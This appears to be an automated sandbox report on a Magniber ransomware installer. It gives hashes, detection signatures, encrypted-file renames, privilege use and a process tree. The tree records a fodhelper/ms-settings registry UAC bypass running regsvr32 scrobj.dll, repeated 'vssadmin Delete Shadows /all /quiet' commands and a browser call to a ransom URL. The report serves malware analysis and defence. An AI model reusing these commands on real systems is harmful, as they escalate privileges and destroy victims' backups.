magniber | 437df22c03110f17f0ddefc4459e271e7b7414a26199f1808f4df91a4dc18126

Analysis

max time kernel
102s
max time network
98s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
10-10-2022 07:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b2b07b32c681a44c647814d09eeac5d691ae67ebf1862bd23c639fce7027685a.msi
Size

92KB
MD5

ddf798fa09f7c72f9fec4478841990d7
SHA1

42b8bc580bd77c330432fb7cf6d9b8c8212961bd
SHA256

b2b07b32c681a44c647814d09eeac5d691ae67ebf1862bd23c639fce7027685a
SHA512

fa39bd42f000e8dffb4638a65cb08ab0f4393a7ed8ef718efa7f3652c00cd1aa31c6f3fb5365674700a08eb066d3e514e7f8131fce0bccd9b5897ea96c9b2425
SSDEEP

768:8lUJ5BxTORGx4/dpZ6G+jzI/RyGwaW27N5MSdm4cyWMDC/yWMDCmYinj:hxTcdpZ6G//RzwaN1d00DU0D37n

Score

10^/10

magniber persistence ransomware

Malware Config

Signatures

Detect magniber ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2768-148-0x0000022C85450000-0x0000022C85453000-memory.dmp	family_magniber
behavioral1/memory/5080-147-0x000001D4CA7D0000-0x000001D4CA7DC000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 6 IoCs

Processes:

msiexec.exemsiexec.exe

flow	pid	Process
3	4384	msiexec.exe
6	4384	msiexec.exe
11	4384	msiexec.exe
20	4384	msiexec.exe
26	4384	msiexec.exe
43	2708	msiexec.exe

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

MsiExec.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\UninstallPush.raw => C:\Users\Admin\Pictures\UninstallPush.raw.vpkrzajx	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\SaveUnpublish.tiff	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\SaveUnpublish.tiff => C:\Users\Admin\Pictures\SaveUnpublish.tiff.vpkrzajx	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\UnlockRestore.tiff	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\UnlockRestore.tiff => C:\Users\Admin\Pictures\UnlockRestore.tiff.vpkrzajx	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\OpenJoin.raw => C:\Users\Admin\Pictures\OpenJoin.raw.vpkrzajx	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\OutGroup.raw => C:\Users\Admin\Pictures\OutGroup.raw.vpkrzajx	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\ResizeGet.tif => C:\Users\Admin\Pictures\ResizeGet.tif.vpkrzajx	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\SaveStop.tif => C:\Users\Admin\Pictures\SaveStop.tif.vpkrzajx	MsiExec.exe

Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid	Process
5080	MsiExec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	Process
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

MsiExec.exe

description	pid	Process	procid_target
PID 5080 set thread context of 2768	5080	MsiExec.exe	43
PID 5080 set thread context of 2820	5080	MsiExec.exe	12
PID 5080 set thread context of 2868	5080	MsiExec.exe	42

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\814f98e7-f167-4e1e-9b70-07bb3cb9eb83.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221010094901.pma	setup.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exe

description	ioc	Process
File opened for modification	C:\Windows\Installer\e573c9b.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{0311111A-8CE9-4820-9F74-1D1FFF54BBAB}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI43EF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3F0C.tmp	msiexec.exe
File created	C:\Windows\Installer\e573c9d.msi	msiexec.exe
File created	C:\Windows\Installer\e573c9b.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000789d96067ff55f5b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000789d96060000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff000000000700010000680900789d9606000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000789d960600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000789d960600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 6 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	Process
4568	vssadmin.exe
2356	vssadmin.exe
2692	vssadmin.exe
776	vssadmin.exe
4604	vssadmin.exe
2864	vssadmin.exe

Modifies registry class 16 IoCs

Processes:

regsvr32.exeregsvr32.exeregsvr32.exesihost.exemsedge.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

NOTEPAD.EXE

pid	Process
2356	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exe

pid	Process
2708	msiexec.exe
2708	msiexec.exe
5080	MsiExec.exe
5080	MsiExec.exe
5048	msedge.exe
5048	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
1960	identity_helper.exe
1960	identity_helper.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MsiExec.exe

pid	Process
5080	MsiExec.exe
5080	MsiExec.exe
5080	MsiExec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid	Process
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exe

description	pid	Process
Token: SeShutdownPrivilege	4384	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4384	msiexec.exe
Token: SeSecurityPrivilege	2708	msiexec.exe
Token: SeCreateTokenPrivilege	4384	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4384	msiexec.exe
Token: SeLockMemoryPrivilege	4384	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4384	msiexec.exe
Token: SeMachineAccountPrivilege	4384	msiexec.exe
Token: SeTcbPrivilege	4384	msiexec.exe
Token: SeSecurityPrivilege	4384	msiexec.exe
Token: SeTakeOwnershipPrivilege	4384	msiexec.exe
Token: SeLoadDriverPrivilege	4384	msiexec.exe
Token: SeSystemProfilePrivilege	4384	msiexec.exe
Token: SeSystemtimePrivilege	4384	msiexec.exe
Token: SeProfSingleProcessPrivilege	4384	msiexec.exe
Token: SeIncBasePriorityPrivilege	4384	msiexec.exe
Token: SeCreatePagefilePrivilege	4384	msiexec.exe
Token: SeCreatePermanentPrivilege	4384	msiexec.exe
Token: SeBackupPrivilege	4384	msiexec.exe
Token: SeRestorePrivilege	4384	msiexec.exe
Token: SeShutdownPrivilege	4384	msiexec.exe
Token: SeDebugPrivilege	4384	msiexec.exe
Token: SeAuditPrivilege	4384	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4384	msiexec.exe
Token: SeChangeNotifyPrivilege	4384	msiexec.exe
Token: SeRemoteShutdownPrivilege	4384	msiexec.exe
Token: SeUndockPrivilege	4384	msiexec.exe
Token: SeSyncAgentPrivilege	4384	msiexec.exe
Token: SeEnableDelegationPrivilege	4384	msiexec.exe
Token: SeManageVolumePrivilege	4384	msiexec.exe
Token: SeImpersonatePrivilege	4384	msiexec.exe
Token: SeCreateGlobalPrivilege	4384	msiexec.exe
Token: SeBackupPrivilege	3628	vssvc.exe
Token: SeRestorePrivilege	3628	vssvc.exe
Token: SeAuditPrivilege	3628	vssvc.exe
Token: SeBackupPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe
Token: SeTakeOwnershipPrivilege	2708	msiexec.exe
Token: SeRestorePrivilege	2708	msiexec.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

msiexec.exemsedge.exe

pid	Process
4384	msiexec.exe
4384	msiexec.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exesvchost.exesihost.exetaskhostw.exeMsiExec.execmd.exemsedge.exe

description	pid	Process	procid_target
PID 2708 wrote to memory of 884	2708	msiexec.exe	96
PID 2708 wrote to memory of 884	2708	msiexec.exe	96
PID 2708 wrote to memory of 5080	2708	msiexec.exe	98
PID 2708 wrote to memory of 5080	2708	msiexec.exe	98
PID 2820 wrote to memory of 1484	2820	svchost.exe	101
PID 2820 wrote to memory of 1484	2820	svchost.exe	101
PID 2768 wrote to memory of 1236	2768	sihost.exe	100
PID 2768 wrote to memory of 1236	2768	sihost.exe	100
PID 2868 wrote to memory of 4996	2868	taskhostw.exe	99
PID 2868 wrote to memory of 4996	2868	taskhostw.exe	99
PID 5080 wrote to memory of 4668	5080	MsiExec.exe	102
PID 5080 wrote to memory of 4668	5080	MsiExec.exe	102
PID 4668 wrote to memory of 3972	4668	cmd.exe	104
PID 4668 wrote to memory of 3972	4668	cmd.exe	104
PID 3972 wrote to memory of 840	3972	msedge.exe	105
PID 3972 wrote to memory of 840	3972	msedge.exe	105
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5060	3972	msedge.exe	109
PID 3972 wrote to memory of 5048	3972	msedge.exe	110
PID 3972 wrote to memory of 5048	3972	msedge.exe	110
PID 3972 wrote to memory of 3264	3972	msedge.exe	112
PID 3972 wrote to memory of 3264	3972	msedge.exe	112
PID 3972 wrote to memory of 3264	3972	msedge.exe	112
PID 3972 wrote to memory of 3264	3972	msedge.exe	112
PID 3972 wrote to memory of 3264	3972	msedge.exe	112
PID 3972 wrote to memory of 3264	3972	msedge.exe	112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2820
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
  2⤵
  - Modifies registry class
  PID:1484
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1428
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:3856
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:224
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:776
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4784
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:2012
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:1860
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2864

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
  2⤵
  - Modifies registry class
  PID:4996
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1500
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:1360
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:3712
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4604
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:5012
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:3288
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:4448
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2356

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2768
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
  2⤵
  - Modifies registry class
  PID:1236
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:5068
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:3112
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:2276
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2692
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:2864
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:5008
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:4544
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4568

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\b2b07b32c681a44c647814d09eeac5d691ae67ebf1862bd23c639fce7027685a.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4384

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:884
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 2CE1F8631E8B8314FBE230FE38C88615
  2⤵
  - Modifies extensions of user files
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:5080
- - C:\Windows\System32\cmd.exe
    cmd /c "start microsoft-edge:http://161cec403evpkrzajx.ridits.info/vpkrzajx^&1^&42175833^&82^&413^&2219041
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4668
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://161cec403evpkrzajx.ridits.info/vpkrzajx&1&42175833&82&413&2219041
      4⤵
      Adds Run key to start application
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3972
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe1ad746f8,0x7ffe1ad74708,0x7ffe1ad74718
        5⤵
        
        PID:840
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
